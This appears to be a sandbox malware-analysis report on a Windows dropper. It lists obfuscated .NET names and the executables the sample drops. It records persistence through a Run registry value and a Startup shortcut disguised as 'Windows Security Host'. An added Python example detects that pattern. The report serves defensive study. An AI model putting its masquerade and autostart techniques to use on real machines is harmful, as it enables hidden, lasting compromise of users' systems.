                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'
                    Source: Windows Security Host.exe.3.dr, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
                    Source: Windows Security Host.exe.3.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: Windows Security Host.exe.3.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: Windows Security Host.exe.3.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: Windows Security Host.exe.3.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: Windows Security Host.exe.3.dr, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: Windows Security Host.exe.3.dr, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: Windows Security Host.exe.3.dr, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe File created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File created: C:\Users\user\Windows Security Host.exe (2 identical entries collapsed)
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe File created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe File created: C:\Users\user\AppData\Local\Temp\Injector.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File created: C:\Users\user\Windows Security Host.exe
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk (2 identical entries collapsed)
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name Windows Security Host (2 identical entries collapsed)
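The Persistence and Boot Survival sections above show one process doing three things that together make up a persistence chain: copying itself to the user profile root, dropping a .lnk into the Startup folder, and writing an HKCU Run value. The following is an added example, not Joe Sandbox code, that parses the report's own event lines (tolerating the missing separator before "File created:" and the trailing "Jump to ..." link text left by the HTML-to-text export) and correlates the mechanisms per source process. The sample lines are constructed from the entries above; the tag names, the masquerade heuristic for "Windows ..."/"Microsoft ..." executables outside C:\Windows, and the rule for what counts as persistent are the example's own assumptions.

```python
"""Correlate per-process persistence events from Joe Sandbox behaviour lines.
Added example (not Joe Sandbox code). Input lines are parsed as exported, including
the glued 'exeFile created:' join and the trailing 'Jump to ...' link text."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Constructed from the Persistence / Boot Survival entries above, exactly as exported.
SAMPLE_EVENTS = [
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all",
    r"Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Temp\Injector.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\Windows Security Host.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnkJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security HostJump to behavior",
]

# Source path always ends in .exe, so the lazy match recovers it even with no separator.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*"
    r"(?P<event>File created|Registry value created or modified):\s*"
    r"(?P<detail>.+?)\s*(?:Jump to (?:behavior|dropped file))?$",
    re.IGNORECASE,
)

# Mechanism heuristics (assumptions of this example, not sandbox signatures).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|\s|$)", re.IGNORECASE)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
USER_ROOT_EXE_RE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.IGNORECASE)
MASQUERADE_RE = re.compile(r"\\(Windows|Microsoft) [^\\]+\.exe$", re.IGNORECASE)
AUTOSTART = {"run_key", "startup_lnk"}
STAGING = {"user_root_copy", "temp_drop"}


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (source process, event type, detail) or None for unhandled event types."""
    m = EVENT_RE.match(line)
    return (m["src"], m["event"].lower(), m["detail"]) if m else None


def classify(event: str, detail: str) -> Set[str]:
    """Tag one event with the persistence mechanism(s) it represents."""
    tags: Set[str] = set()
    if event.startswith("registry") and RUN_KEY_RE.search(detail):
        tags.add("run_key")
    if event == "file created":
        if STARTUP_LNK_RE.search(detail):
            tags.add("startup_lnk")
        if USER_ROOT_EXE_RE.match(detail):
            tags.add("user_root_copy")
        if TEMP_EXE_RE.search(detail):
            tags.add("temp_drop")
        # A Windows-sounding executable name outside C:\Windows is a masquerade hint.
        if MASQUERADE_RE.search(detail) and not detail.lower().startswith("c:\\windows\\"):
            tags.add("masquerade_name")
    return tags


def correlate(lines: List[str]) -> Dict[str, Set[str]]:
    """Union of mechanism tags per source process; unparsed lines are skipped."""
    by_process: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        parsed = parse_event(line)
        if parsed:
            src, event, detail = parsed
            by_process[src] |= classify(event, detail)
    return dict(by_process)


def persistent_processes(lines: List[str]) -> List[str]:
    """Processes that registered an autostart AND staged a copy of a binary."""
    return sorted(src for src, tags in correlate(lines).items()
                  if tags & AUTOSTART and tags & STAGING)


if __name__ == "__main__":
    for src, tags in correlate(SAMPLE_EVENTS).items():
        print(f"{src}: {', '.join(sorted(tags))}")
    print("persistent:", persistent_processes(SAMPLE_EVENTS))
```

On the sample lines, only C:\Users\user\AppData\Local\Temp\Windows Security Host.exe ends up with both an autostart tag and a staging tag; 8Hd0ZExgJz.exe is tagged only as a Temp dropper, and the cmd.exe process-creation line is skipped because the parser handles only the two event types it is built for. The same correlation applies to live telemetry (Sysmon event ID 11 file creates and ID 13 registry sets keyed on the same process GUID) once the parser is swapped for the log format in use.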

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 identical entries collapsed)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 identical entries collapsed)
                    Note: PowerShell reads the manifest of every module on $PSModulePath while resolving command names (module auto-loading), so manifest opens alone do not show that any BitLocker cmdlet was invoked.
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot (change notifications on the certificate store are registered by CryptoAPI during chain building and are expected from any process that makes TLS connections)
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe Process information set: NOOPENFILEERRORBOX (20 identical entries collapsed)
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe Process information set: NOOPENFILEERRORBOX (16 identical entries collapsed)
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
